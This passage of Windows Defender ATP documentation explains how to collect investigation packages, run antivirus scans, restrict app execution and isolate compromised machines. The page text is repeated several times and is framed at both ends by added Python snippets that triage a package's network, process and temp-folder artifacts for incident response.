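                         "runs_from_temp": "\\temp\\" in path.lower()})
    return findings


if __name__ == "__main__":
    for finding in external_connections(NETSTAT_SAMPLE, PROCESSES_SAMPLE):
        print(finding)
    print(collected_file_status(NO_KEY_MESSAGE))
```

A PID in the connection list that is missing from the Processes .CSV is itself worth noting: the two snapshots are taken at slightly different moments, so a short-lived process can show up in one and not the other.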

Run Windows Defender Antivirus scan on machines


As part of the investigation or response process, you can remotely initiate an antivirus scan to help identify and
remediate malware that might be present on a compromised machine.

IMPORTANT
This action is available for machines on Windows 10, version 1709 or later.
A Windows Defender Antivirus (Windows Defender AV) scan can run alongside other antivirus solutions, whether Windows
Defender AV is the active antivirus solution or not. Windows Defender AV can be in Passive mode. For more information,
see Windows Defender Antivirus compatibility.

1. Select the machine that you want to run the scan on. You can select or search for a machine from any of the
following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Run antivirus scan.

3. Select the scan type that you'd like to run. You can choose between a quick or a full scan.
4. Type a comment and select Yes, run scan to start the scan.
The Action center shows the scan information:
Submission time - Shows when the action was submitted.
Status - Indicates any pending actions or the results of completed actions.
The machine timeline will include a new event, reflecting that a scan action was submitted on the machine.
Windows Defender AV alerts will reflect any detections that surfaced during the scan.

Restrict app execution


In addition to the ability of containing an attack by stopping malicious processes, you can also lock down a device
and prevent subsequent attempts of potentially malicious programs from running.

IMPORTANT
This action is available for machines on Windows 10, version 1709 or later.
This feature is available if your organization uses Windows Defender Antivirus.
This action needs to meet the Windows Defender Application Control code integrity policy formats and signing
requirements. For more information, see Code integrity policy formats and signing.

The action to restrict an application from running applies a code integrity policy that only allows files signed by a
Microsoft-issued certificate to run. This restriction can help prevent an attacker from controlling compromised
machines and performing further malicious activities. Because only Microsoft-signed code is allowed, expect
legitimate third-party applications on the machine to be blocked as well while the restriction is in place.

NOTE
You’ll be able to reverse the restriction of applications from running at any time.

1. Select the machine where you'd like to restrict an application from running from. You can select or search for
a machine from any of the following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Restrict app execution.

3. Type a comment and select Yes, restrict app execution to take action on the machine.
The Action center shows the submission information:
Submission time - Shows when the action was submitted.
Status - Indicates any pending actions or the results of completed actions.
When the application execution restriction configuration is applied, a new event is reflected in the machine timeline.
Notification on machine user:
When an app is restricted, the following notification is displayed to inform the user that an app is being restricted
from running:

Remove app restriction


Depending on the severity of the attack and the state of the machine, you can choose to reverse the restriction of
applications policy after you have verified that the compromised machine has been remediated.
1. Select the machine where you restricted an application from running from.
2. Open the Actions menu and select Remove app restrictions.

3. Type a comment and select Yes, remove restriction to take action on the application. The machine
application restriction will no longer apply on the machine.

Isolate machines from the network


Depending on the severity of the attack and the sensitivity of the machine, you might want to isolate the machine
from the network. This action can help prevent the attacker from controlling the compromised machine and
performing further activities such as data exfiltration and lateral movement.

IMPORTANT
Full isolation is available for machines on Windows 10, version 1703 or later.
Selective isolation is available for machines on Windows 10, version 1709 or later.

This machine isolation feature disconnects the compromised machine from the network while retaining
connectivity to the Windows Defender ATP service, which continues to monitor the machine.
On Windows 10, version 1709 or later, you'll have additional control over the network isolation level. You can also
choose to enable Outlook and Skype for Business connectivity (a.k.a 'Selective Isolation').
NOTE
You’ll be able to reconnect the machine back to the network at any time.

1. Select the machine that you want to isolate. You can select or search for a machine from any of the following
views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Isolate machine.

3. Select the check-box if you'd like to enable Outlook and Skype communication while the machine is isolated
(a.k.a. 'Selective Isolation').
4. Type a comment and select Yes, isolate machine to take action on the machine.

NOTE
The machine will remain connected to the Windows Defender ATP service even if it is isolated from the network. If
you've chosen to enable Outlook and Skype for Business communication, then you'll be able to communicate to the
user while the machine is isolated.

The Action center shows the submission information:


Submission time - Shows when the action was submitted.
Status - Indicates any pending actions or the results of completed actions. Additional indications will be
provided if you've enabled Outlook and Skype for Business communication.
When the isolation configuration is applied, a new event is reflected in the machine timeline.
Notification on machine user:
When a machine is being isolated, the following notification is displayed to inform the user that the machine is
being isolated from the network:

Release machine from isolation


Depending on the severity of the attack and the state of the machine, you can choose to release the machine from
isolation after you have verified that the compromised machine has been remediated.
1. Select a machine that was previously isolated.
2. Open the Actions menu and select Release from isolation.

3. Type a comment and select Yes, release machine to take action on the machine. The machine will be
reconnected to the network.

Check activity details in Action center


The Action center provides information on actions that were taken on a machine or file. You’ll be able to view the
following details:
Investigation package collection
Antivirus scan
App restriction
Machine isolation
All other related details are also shown, for example, submission time, submitting user, and whether the action
succeeded or failed.
Related topic
Take response actions on a file
Take response actions on a machine
4/22/2019 • 11 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Quickly respond to detected attacks by isolating machines or collecting an investigation package. After taking
action on machines, you can check activity details on the Action center.

IMPORTANT
These response actions are only available for machines on Windows 10, version 1703 or later.
For non-Windows platforms, response capabilities (such as machine isolation) depend on third-party capabilities.

Collect investigation package from machines


As part of the investigation or response process, you can collect an investigation package from a machine. By
collecting the investigation package, you can identify the current state of the machine and further understand the
tools and techniques used by the attacker.

IMPORTANT
This response action is available for machines on Windows 10, version 1703 or later.

You can download the package (Zip file) and investigate the events that occurred on a machine.
The package contains the following folders:

FOLDER DESCRIPTION

Autoruns Contains a set of files that each represent the content of the
registry of a known auto start entry point (ASEP) to help
identify attacker’s persistency on the machine.
NOTE: If the registry key is not found, the file will contain the
following message: “ERROR: The system was unable to find the
specified registry key or value.”

Installed programs This .CSV file contains the list of installed programs that can
help identify what is currently installed on the machine. For
more information, see Win32_Product class.
FOLDER DESCRIPTION

Network connections This folder contains a set of data points related to the
connectivity information which can help in identifying
connectivity to suspicious URLs, attacker’s command and
control (C&C) infrastructure, any lateral movement, or remote
connections.
- ActiveNetworkConnections.txt – Displays protocol statistics
and current TCP/IP network connections. Provides the ability
to look for suspicious connectivity made by a process.

- Arp.txt – Displays the current address resolution protocol


(ARP) cache tables for all interfaces.

ARP cache can reveal additional hosts on a network that have


been compromised or suspicious systems on the network that
night have been used to run an internal attack.

- Dnscache.txt - Displays the contents of the DNS client


resolver cache, which includes both entries preloaded from the
local Hosts file and any recently obtained resource records for
name queries resolved by the computer. This can help in
identifying suspicious connections.

- Ipconfig.txt – Displays the full TCP/IP configuration for all


adapters. Adapters can represent physical interfaces, such as
installed network adapters, or logical interfaces, such as dial-up
connections.

Prefetch files Windows Prefetch files are designed to speed up the


application startup process. It can be used to track all the files
recently used in the system and find traces for applications
that might have been deleted but can still be found in the
prefetch file list.
- Prefetch folder – Contains a copy of the prefetch files from
%SystemRoot%\Prefetch . NOTE: It is suggested to download
a prefetch file viewer to view the prefetch files.

- PrefetchFilesList.txt – Contains the list of all the copied files


which can be used to track if there were any copy failures to
the prefetch folder.

Processes Contains a .CSV file listing the running processes which


provides the ability to identify current processes running on
the machine. This can be useful when identifying a suspicious
process and its state.

Scheduled tasks Contains a .CSV file listing the scheduled tasks which can be
used to identify routines performed automatically on a chosen
machine to look for suspicious code which was set to run
automatically.

Security event log Contains the security event log which contains records of login
or logout activity, or other security-related events specified by
the system's audit policy.
NOTE: Open the event log file using Event viewer.

Services Contains the services.txt file which lists services and their
states.
FOLDER DESCRIPTION

Windows Server Message Block (SMB) sessions Lists shared access to files, printers, and serial ports and
miscellaneous communications between nodes on a network.
This can help identify data exfiltration or lateral movement.
Contains files for SMBInboundSessions and
SMBOutboundSession.

NOTE: If the file contains the following message: “ERROR: The


system was unable to find the specified registry key or value.”,
it means that there were no SMB sessions of this type
(inbound or outbound).

Temp Directories Contains a set of text files that lists the files located in
%Temp% for every user in the system.
This can help to track suspicious files that an attacker may
have dropped on the system.

NOTE: If the file contains the following message: “The system


cannot find the path specified”, it means that there is no temp
directory for this user, and might be because the user didn’t
log in to the system.

Users and Groups Provides a list of files that each represent a group and its
members.

CollectionSummaryReport.xls This file is a summary of the investigation package collection, it


contains the list of data points, the command used to extract
the data, the execution status, and the error code in case of
failure. You can use this report to track if the package includes
all the expected data and identify if there were any errors.

1. Select the machine that you want to investigate. You can select or search for a machine from any of the
following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the heading of the machine name from the machines list.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Collect investigation package.
3. Type a comment and select Yes, collect package to take action on the machine.

The Action center shows the submission information:

Submission time - Shows when the action was submitted.


Status - Indicates if the package was successfully collected from the network. When the collection is
complete, you can download the package.
4. Select Package available to download the package.
When the package is available a new event will be added to the machine timeline.
You can download the package from the machine page, or the Action center.
You can also search for historical packages in the machine timeline.

Run Windows Defender Antivirus scan on machines


As part of the investigation or response process, you can remotely initiate an antivirus scan to help identify and
remediate malware that might be present on a compromised machine.

IMPORTANT
This action is available for machines on Windows 10, version 1709 or later.
A Windows Defender Antivirus (Windows Defender AV) scan can run alongside other antivirus solutions, whether Windows
Defender AV is the active antivirus solution or not. Windows Defender AV can be in Passive mode. For more information,
see Windows Defender Antivirus compatibility.

1. Select the machine that you want to run the scan on. You can select or search for a machine from any of the
following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Run antivirus scan.

3. Select the scan type that you'd like to run. You can choose between a quick or a full scan.
4. Type a comment and select Yes, run scan to start the scan.
The Action center shows the scan information:

Submission time - Shows when the action was submitted.


Status - Indicates any pending actions or the results of completed actions.
The machine timeline will include a new event, reflecting that a scan action was submitted on the machine.
Windows Defender AV alerts will reflect any detections that surfaced during the scan.

Restrict app execution


In addition to the ability of containing an attack by stopping malicious processes, you can also lock down a device
and prevent subsequent attempts of potentially malicious programs from running.

IMPORTANT
This action is available for machines on Windows 10, version 1709 or later.
This feature is available if your organization uses Windows Defender Antivirus.
This action needs to meet the Windows Defender Application Control code integrity policy formats and signing
requirements. For more information, see Code integrity policy formats and signing.

The action to restrict an application from running applies a code integrity policy that only allows running of files
that are signed by a Microsoft issued certificate. This method of restriction can help prevent an attacker from
controlling compromised machines and performing further malicious activities.

NOTE
You’ll be able to reverse the restriction of applications from running at any time.

1. Select the machine where you'd like to restrict an application from running from. You can select or search for
a machine from any of the following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Restrict app execution.

3. Type a comment and select Yes, restict app execution to take action on the file.
The Action center shows the submission information:

Submission time - Shows when the action was submitted.


Status - Indicates any pending actions or the results of completed actions.
When the application execution restriction configuration is applied, a new event is reflected in the machine timeline.
Notification on machine user:
When an app is restricted, the following notification is displayed to inform the user that an app is being restricted
from running:

Remove app restriction


Depending on the severity of the attack and the state of the machine, you can choose to reverse the restriction of
applications policy after you have verified that the compromised machine has been remediated.
1. Select the machine where you restricted an application from running from.
2. Open the Actions menu and select Remove app restrictions.

3. Type a comment and select Yes, remove restriction to take action on the application. The machine
application restriction will no longer apply on the machine.

Isolate machines from the network


Depending on the severity of the attack and the sensitivity of the machine, you might want to isolate the machine
from the network. This action can help prevent the attacker from controlling the compromised machine and
performing further activities such as data exfiltration and lateral movement.

IMPORTANT
Full isolation is available for machines on Windows 10, version 1703.
Selective isolation is available for machines on Windows 10, version 1709 or later.

This machine isolation feature disconnects the compromised machine from the network while retaining
connectivity to the Windows Defender ATP service, which continues to monitor the machine.
On Windows 10, version 1709 or later, you'll have additional control over the network isolation level. You can also
choose to enable Outlook and Skype for Business connectivity (a.k.a 'Selective Isolation').
NOTE
You’ll be able to reconnect the machine back to the network at any time.

1. Select the machine that you want to isolate. You can select or search for a machine from any of the following
views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Isolate machine.

3. Select the check-box if you'd like to enable Outlook and Skype communication while the machine is isolated
(a.k.a. 'Selective Isolation').
4. Type a comment and select Yes, isolate machine to take action on the machine.

NOTE
The machine will remain connected to the Windows Defender ATP service even if it is isolated from the network. If
you've chosen to enable Outlook and Skype for Business communication, then you'll be able to communicate to the
user while the machine is isolated.

The Action center shows the submission information:


Submission time - Shows when the action was submitted.
Status - Indicates any pending actions or the results of completed actions. Additional indications will be
provided if you've enabled Outlook and Skype for Business communication.
When the isolation configuration is applied, a new event is reflected in the machine timeline.
Notification on machine user:
When a machine is being isolated, the following notification is displayed to inform the user that the machine is
being isolated from the network:

Release machine from isolation


Depending on the severity of the attack and the state of the machine you can choose to release the machine from
isolation after you have verified that the compromised machine has been remediated.
1. Select a machine that was previously isolated.
2. Open the Actions menu and select Release from isolation.

3. Type a comment and select Yes, release machine to take action on the machine. The machine will be
reconnected to the network.

Check activity details in Action center


The Action center provides information on actions that were taken on a machine or file. You’ll be able to view the
following details:
Investigation package collection
Antivirus scan
App restriction
Machine isolation
All other related details are also shown, for example, submission time, submitting user, and if the action succeeded
or failed.
Related topic
Take response actions on a file
Take response actions on a machine
4/22/2019 • 11 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )

Want to experience Windows Defender ATP? Sign up for a free trial.

Quickly respond to detected attacks by isolating machines or collecting an investigation package. After taking
action on machines, you can check activity details on the Action center.

IMPORTANT
These response actions are only available for machines on Windows 10, version 1703 or later.
For non-Windows platforms, response capabilities (such as Machine isolation) are dependent on the third-party
capabilities.

Collect investigation package from machines


As part of the investigation or response process, you can collect an investigation package from a machine. By
collecting the investigation package, you can identify the current state of the machine and further understand the
tools and techniques used by the attacker.

IMPORTANT
This response action is available for machines on Windows 10, version 1703 or later.

You can download the package (Zip file) and investigate the events that occurred on a machine.
The package contains the following folders:

FOLDER DESCRIPTION

Autoruns Contains a set of files that each represent the content of the
registry of a known auto start entry point (ASEP) to help
identify attacker’s persistency on the machine.
NOTE: If the registry key is not found, the file will contain the
following message: “ERROR: The system was unable to find the
specified registry key or value.”

Installed programs This .CSV file contains the list of installed programs that can
help identify what is currently installed on the machine. For
more information, see Win32_Product class.
FOLDER DESCRIPTION

Network connections This folder contains a set of data points related to the
connectivity information which can help in identifying
connectivity to suspicious URLs, attacker’s command and
control (C&C) infrastructure, any lateral movement, or remote
connections.
- ActiveNetworkConnections.txt – Displays protocol statistics
and current TCP/IP network connections. Provides the ability
to look for suspicious connectivity made by a process.

- Arp.txt – Displays the current address resolution protocol


(ARP) cache tables for all interfaces.

ARP cache can reveal additional hosts on a network that have


been compromised or suspicious systems on the network that
night have been used to run an internal attack.

- Dnscache.txt - Displays the contents of the DNS client


resolver cache, which includes both entries preloaded from the
local Hosts file and any recently obtained resource records for
name queries resolved by the computer. This can help in
identifying suspicious connections.

- Ipconfig.txt – Displays the full TCP/IP configuration for all


adapters. Adapters can represent physical interfaces, such as
installed network adapters, or logical interfaces, such as dial-up
connections.

Prefetch files Windows Prefetch files are designed to speed up the


application startup process. It can be used to track all the files
recently used in the system and find traces for applications
that might have been deleted but can still be found in the
prefetch file list.
- Prefetch folder – Contains a copy of the prefetch files from
%SystemRoot%\Prefetch . NOTE: It is suggested to download
a prefetch file viewer to view the prefetch files.

- PrefetchFilesList.txt – Contains the list of all the copied files


which can be used to track if there were any copy failures to
the prefetch folder.

Processes Contains a .CSV file listing the running processes which


provides the ability to identify current processes running on
the machine. This can be useful when identifying a suspicious
process and its state.

Scheduled tasks Contains a .CSV file listing the scheduled tasks which can be
used to identify routines performed automatically on a chosen
machine to look for suspicious code which was set to run
automatically.

Security event log Contains the security event log which contains records of login
or logout activity, or other security-related events specified by
the system's audit policy.
NOTE: Open the event log file using Event viewer.

Services Contains the services.txt file which lists services and their
states.
FOLDER DESCRIPTION

Windows Server Message Block (SMB) sessions Lists shared access to files, printers, and serial ports and
miscellaneous communications between nodes on a network.
This can help identify data exfiltration or lateral movement.
Contains files for SMBInboundSessions and
SMBOutboundSession.

NOTE: If the file contains the following message: “ERROR: The


system was unable to find the specified registry key or value.”,
it means that there were no SMB sessions of this type
(inbound or outbound).

Temp Directories Contains a set of text files that lists the files located in
%Temp% for every user in the system.
This can help to track suspicious files that an attacker may
have dropped on the system.

NOTE: If the file contains the following message: “The system


cannot find the path specified”, it means that there is no temp
directory for this user, and might be because the user didn’t
log in to the system.

Users and Groups Provides a list of files that each represent a group and its
members.

CollectionSummaryReport.xls This file is a summary of the investigation package collection, it


contains the list of data points, the command used to extract
the data, the execution status, and the error code in case of
failure. You can use this report to track if the package includes
all the expected data and identify if there were any errors.

1. Select the machine that you want to investigate. You can select or search for a machine from any of the
following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the heading of the machine name from the machines list.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Collect investigation package.
3. Type a comment and select Yes, collect package to take action on the machine.

The Action center shows the submission information:

Submission time - Shows when the action was submitted.


Status - Indicates if the package was successfully collected from the network. When the collection is
complete, you can download the package.
4. Select Package available to download the package.
When the package is available a new event will be added to the machine timeline.
You can download the package from the machine page, or the Action center.
You can also search for historical packages in the machine timeline.

Run Windows Defender Antivirus scan on machines


As part of the investigation or response process, you can remotely initiate an antivirus scan to help identify and
remediate malware that might be present on a compromised machine.

IMPORTANT
This action is available for machines on Windows 10, version 1709 or later.
A Windows Defender Antivirus (Windows Defender AV) scan can run alongside other antivirus solutions, whether Windows
Defender AV is the active antivirus solution or not. Windows Defender AV can be in Passive mode. For more information,
see Windows Defender Antivirus compatibility.

1. Select the machine that you want to run the scan on. You can select or search for a machine from any of the
following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Run antivirus scan.

3. Select the scan type that you'd like to run. You can choose between a quick or a full scan.
4. Type a comment and select Yes, run scan to start the scan.
The Action center shows the scan information:

Submission time - Shows when the action was submitted.


Status - Indicates any pending actions or the results of completed actions.
The machine timeline will include a new event, reflecting that a scan action was submitted on the machine.
Windows Defender AV alerts will reflect any detections that surfaced during the scan.

Restrict app execution


In addition to the ability of containing an attack by stopping malicious processes, you can also lock down a device
and prevent subsequent attempts of potentially malicious programs from running.

IMPORTANT
This action is available for machines on Windows 10, version 1709 or later.
This feature is available if your organization uses Windows Defender Antivirus.
This action needs to meet the Windows Defender Application Control code integrity policy formats and signing
requirements. For more information, see Code integrity policy formats and signing.

The action to restrict an application from running applies a code integrity policy that only allows running of files
that are signed by a Microsoft issued certificate. This method of restriction can help prevent an attacker from
controlling compromised machines and performing further malicious activities.

NOTE
You’ll be able to reverse the restriction of applications from running at any time.

1. Select the machine where you'd like to restrict an application from running from. You can select or search for
a machine from any of the following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Restrict app execution.

3. Type a comment and select Yes, restict app execution to take action on the file.
The Action center shows the submission information:

Submission time - Shows when the action was submitted.


Status - Indicates any pending actions or the results of completed actions.
When the application execution restriction configuration is applied, a new event is reflected in the machine timeline.
Notification on machine user:
When an app is restricted, the following notification is displayed to inform the user that an app is being restricted
from running:

Remove app restriction


Depending on the severity of the attack and the state of the machine, you can choose to reverse the restriction of
applications policy after you have verified that the compromised machine has been remediated.
1. Select the machine where you restricted an application from running from.
2. Open the Actions menu and select Remove app restrictions.

3. Type a comment and select Yes, remove restriction to take action on the application. The machine
application restriction will no longer apply on the machine.

Isolate machines from the network


Depending on the severity of the attack and the sensitivity of the machine, you might want to isolate the machine
from the network. This action can help prevent the attacker from controlling the compromised machine and
performing further activities such as data exfiltration and lateral movement.

IMPORTANT
Full isolation is available for machines on Windows 10, version 1703.
Selective isolation is available for machines on Windows 10, version 1709 or later.

This machine isolation feature disconnects the compromised machine from the network while retaining
connectivity to the Windows Defender ATP service, which continues to monitor the machine.
On Windows 10, version 1709 or later, you'll have additional control over the network isolation level. You can also
choose to enable Outlook and Skype for Business connectivity (a.k.a 'Selective Isolation').
NOTE
You’ll be able to reconnect the machine back to the network at any time.

1. Select the machine that you want to isolate. You can select or search for a machine from any of the following
views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Isolate machine.

3. Select the check-box if you'd like to enable Outlook and Skype communication while the machine is isolated
(a.k.a. 'Selective Isolation').
4. Type a comment and select Yes, isolate machine to take action on the machine.

NOTE
The machine will remain connected to the Windows Defender ATP service even if it is isolated from the network. If
you've chosen to enable Outlook and Skype for Business communication, then you'll be able to communicate to the
user while the machine is isolated.

The Action center shows the submission information:


Submission time - Shows when the action was submitted.
Status - Indicates any pending actions or the results of completed actions. Additional indications will be
provided if you've enabled Outlook and Skype for Business communication.
When the isolation configuration is applied, a new event is reflected in the machine timeline.
Notification on machine user:
When a machine is being isolated, the following notification is displayed to inform the user that the machine is
being isolated from the network:

Release machine from isolation


Depending on the severity of the attack and the state of the machine you can choose to release the machine from
isolation after you have verified that the compromised machine has been remediated.
1. Select a machine that was previously isolated.
2. Open the Actions menu and select Release from isolation.

3. Type a comment and select Yes, release machine to take action on the machine. The machine will be
reconnected to the network.

Check activity details in Action center


The Action center provides information on actions that were taken on a machine or file. You’ll be able to view the
following details:
Investigation package collection
Antivirus scan
App restriction
Machine isolation
All other related details are also shown, for example, submission time, submitting user, and if the action succeeded
or failed.
Related topic
Take response actions on a file
Take response actions on a machine
4/22/2019 • 11 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )

Want to experience Windows Defender ATP? Sign up for a free trial.

Quickly respond to detected attacks by isolating machines or collecting an investigation package. After taking
action on machines, you can check activity details on the Action center.

IMPORTANT
These response actions are only available for machines on Windows 10, version 1703 or later.
For non-Windows platforms, response capabilities (such as Machine isolation) are dependent on the third-party
capabilities.

Collect investigation package from machines


As part of the investigation or response process, you can collect an investigation package from a machine. By
collecting the investigation package, you can identify the current state of the machine and further understand the
tools and techniques used by the attacker.

IMPORTANT
This response action is available for machines on Windows 10, version 1703 or later.

You can download the package (Zip file) and investigate the events that occurred on a machine.
The package contains the following folders:

FOLDER DESCRIPTION

Autoruns Contains a set of files that each represent the content of the
registry of a known auto start entry point (ASEP) to help
identify attacker’s persistency on the machine.
NOTE: If the registry key is not found, the file will contain the
following message: “ERROR: The system was unable to find the
specified registry key or value.”

Installed programs - This .CSV file contains the list of installed programs that can
help identify what is currently installed on the machine. For more information, see
Win32_Product class.

Network connections - This folder contains a set of data points related to the
connectivity information which can help in identifying connectivity to suspicious
URLs, attacker’s command and control (C&C) infrastructure, any lateral movement, or
remote connections.
- ActiveNetworkConnections.txt – Displays protocol statistics and current TCP/IP
network connections. Provides the ability to look for suspicious connectivity made by
a process.
- Arp.txt – Displays the current address resolution protocol (ARP) cache tables for
all interfaces. The ARP cache can reveal additional hosts on a network that have been
compromised, or suspicious systems on the network that might have been used to run an
internal attack.
- Dnscache.txt – Displays the contents of the DNS client resolver cache, which
includes both entries preloaded from the local Hosts file and any recently obtained
resource records for name queries resolved by the computer. This can help in
identifying suspicious connections.
- Ipconfig.txt – Displays the full TCP/IP configuration for all adapters. Adapters
can represent physical interfaces, such as installed network adapters, or logical
interfaces, such as dial-up connections.

Prefetch files - Windows Prefetch files are designed to speed up the application
startup process. They can be used to track all the files recently used in the system
and find traces of applications that might have been deleted but can still be found
in the prefetch file list.
- Prefetch folder – Contains a copy of the prefetch files from %SystemRoot%\Prefetch.
NOTE: It is suggested to download a prefetch file viewer to view the prefetch files.
- PrefetchFilesList.txt – Contains the list of all the copied files, which can be
used to track if there were any copy failures to the prefetch folder.

Processes - Contains a .CSV file listing the running processes, which provides the
ability to identify current processes running on the machine. This can be useful when
identifying a suspicious process and its state.

Scheduled tasks - Contains a .CSV file listing the scheduled tasks, which can be used
to identify routines performed automatically on a chosen machine to look for
suspicious code which was set to run automatically.

Security event log - Contains the security event log, which contains records of
login or logout activity, or other security-related events specified by the system's
audit policy.
NOTE: Open the event log file using Event viewer.

Services - Contains the services.txt file, which lists services and their states.

Windows Server Message Block (SMB) sessions - Lists shared access to files, printers,
and serial ports and miscellaneous communications between nodes on a network. This
can help identify data exfiltration or lateral movement. Contains files for
SMBInboundSessions and SMBOutboundSession.
NOTE: If the file contains the following message: “ERROR: The system was unable to
find the specified registry key or value.”, it means that there were no SMB sessions
of this type (inbound or outbound).

Temp Directories - Contains a set of text files that list the files located in %Temp%
for every user in the system. This can help to track suspicious files that an
attacker may have dropped on the system.
NOTE: If the file contains the following message: “The system cannot find the path
specified”, it means that there is no temp directory for this user, and might be
because the user didn’t log in to the system.

Users and Groups - Provides a list of files that each represent a group and its
members.

CollectionSummaryReport.xls - This file is a summary of the investigation package
collection. It contains the list of data points, the command used to extract the
data, the execution status, and the error code in case of failure. You can use this
report to track if the package includes all the expected data and identify if there
were any errors.

1. Select the machine that you want to investigate. You can select or search for a machine from any of the
following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the heading of the machine name from the machines list.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Collect investigation package.
3. Type a comment and select Yes, collect package to take action on the machine.

The Action center shows the submission information:
Submission time - Shows when the action was submitted.
Status - Indicates if the package was successfully collected from the network. When the collection is
complete, you can download the package.
4. Select Package available to download the package.
When the package is available a new event will be added to the machine timeline.
You can download the package from the machine page, or the Action center.
You can also search for historical packages in the machine timeline.
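Once the Zip is downloaded, a first-pass completeness check saves time before opening individual artifacts. The script below is an added example, not Microsoft's code: it walks the package, marks each artifact named in the folder table as collected, empty (carrying one of the documented "not found" messages), blank, or missing, and builds a constructed sample Zip inline so it runs offline. The entry paths and .txt extensions inside the Zip are assumptions modelled on the table; adjust EXPECTED and VARIABLE_FOLDERS to the layout of a real package.

```python
"""Triage a downloaded Windows Defender ATP investigation package (Zip file).

Added example, not Microsoft's code. For each artifact named in the folder
table it distinguishes 'data' (collected), 'empty' (collected, but the
documented "not found" message was written instead), 'error' (file present
but blank) and 'missing' (not in the Zip at all). Entry paths and the .txt
extensions are assumptions modelled on the table, not the real layout.
"""
import io
import zipfile

# Sentinel messages the documentation says appear in an artifact when there
# was nothing to collect (no SMB sessions, ASEP key absent, no %Temp% dir).
NO_REGISTRY_KEY = "ERROR: The system was unable to find the specified registry key or value."
NO_TEMP_DIR = "The system cannot find the path specified"

# Assumed relative paths inside the Zip (folder names taken from the table).
EXPECTED = [
    "Network connections/ActiveNetworkConnections.txt",
    "Network connections/Arp.txt",
    "Network connections/Dnscache.txt",
    "Network connections/Ipconfig.txt",
    "Prefetch files/PrefetchFilesList.txt",
    "Services/services.txt",
    "SMB sessions/SMBInboundSessions.txt",
    "SMB sessions/SMBOutboundSession.txt",
    "CollectionSummaryReport.xls",
]
# Folders whose file names vary per machine (one file per user / per ASEP).
VARIABLE_FOLDERS = ("Temp Directories/", "Autoruns/")


def classify_text(text: str) -> str:
    """Classify one collected text artifact as 'data', 'empty' or 'error'."""
    stripped = text.strip()
    if not stripped:
        # Collector produced a file but wrote nothing: cross-check the error
        # code for this data point in CollectionSummaryReport.xls.
        return "error"
    if NO_REGISTRY_KEY in stripped or NO_TEMP_DIR in stripped:
        return "empty"
    return "data"


def triage_package(zip_bytes: bytes) -> dict:
    """Return {entry: state} for every expected entry plus any per-user or
    per-ASEP files found under the variable folders."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = set(zf.namelist())
        for entry in EXPECTED:
            if entry not in names:
                result[entry] = "missing"
            elif entry.endswith(".xls"):
                # Binary report: only check that something was written.
                result[entry] = "data" if zf.getinfo(entry).file_size else "error"
            else:
                result[entry] = classify_text(zf.read(entry).decode("utf-8", "replace"))
        for name in sorted(names):
            if name.startswith(VARIABLE_FOLDERS) and not name.endswith("/"):
                result[name] = classify_text(zf.read(name).decode("utf-8", "replace"))
    return result


def summarize(result: dict) -> dict:
    """Count entries per state so a gap in the package stands out at a glance."""
    counts = {"data": 0, "empty": 0, "error": 0, "missing": 0}
    for state in result.values():
        counts[state] += 1
    return counts


def build_sample_package() -> bytes:
    """Constructed sample Zip standing in for a real download (not real data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Network connections/ActiveNetworkConnections.txt",
                    "Proto  Local Address   Foreign Address    State        PID\n"
                    "TCP    10.0.0.5:49712  203.0.113.10:443   ESTABLISHED  4120\n")
        zf.writestr("Network connections/Arp.txt", "Interface: 10.0.0.5 --- 0x6\n")
        zf.writestr("Network connections/Dnscache.txt", "")   # blank: collector wrote nothing
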